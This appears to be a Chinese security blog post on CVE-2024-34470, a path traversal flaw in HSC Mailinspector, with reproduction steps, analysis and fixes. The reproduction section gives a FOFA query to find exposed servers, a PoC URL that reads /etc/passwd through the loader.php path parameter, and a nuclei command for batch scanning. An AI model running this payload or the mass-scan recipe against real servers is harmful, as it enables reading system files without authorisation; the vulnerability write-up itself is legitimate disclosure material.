#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)

发布于:2025-07-07 ⋅ 阅读:(19) ⋅ 点赞:(0)

免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。

目录

HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)

0x01漏洞概述

0x02漏洞复现

0x03漏洞分析

0x04修复建议

HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)

0x01漏洞概述

HSC Mailinspector 是一种邮件安全解决方案,旨在保护企业和组织免受各种电子邮件威胁的影响。它提供了一系列功能,包括针对垃圾邮件、恶意软件、垃圾邮件和其他网络威胁的过滤和检测。

在 HSC Mailinspector 的 5.2.17-3 版本到 5.2.18 版本之间发现了一个问题。在 /public/loader.php 文件中存在一个未经身份验证的路径遍历漏洞。path参数没有正确过滤传递的文件和目录是否属于 Web 根目录,这使得攻击者能够读取服务器上的任意文件。

受影响版本

HSC Mailinspector : 5.2.17-3<=version<=5.2.18受影响。

CVE编号

CVE-2024-34470

0x02漏洞复现

fofa

body="mailinspector/public"

1.poc

https://target-IP/mailinspector/public/loader.php?path=../../../../../../../etc/passwd

构造如上payload,将target-IP替换成目的IP,在浏览器或burp中打开,即可查看目标系统的文件。

2.批量检测poc

使用nuclei,下载地址:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-34470.yaml

使用命令,nuclei.exe -t CVE-2024-34470.yaml -l 1.txt

图片

0x03漏洞分析

这个漏洞的成因是在/public/loader.php文件中存在path参数没有正确过滤传递的文件和目录是否属于网络根目录,从而允许攻击者读取服务器上的任意文件。

0x04修复建议

1.目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://hsclabs.com/mailinspector/

2.限制用户权限,避免授予过高的权限。

3.实施严格的访问控制和身份验证机制,以防止未经授权的访问


网站公告

今日签到

点亮在社区的每一天
去签到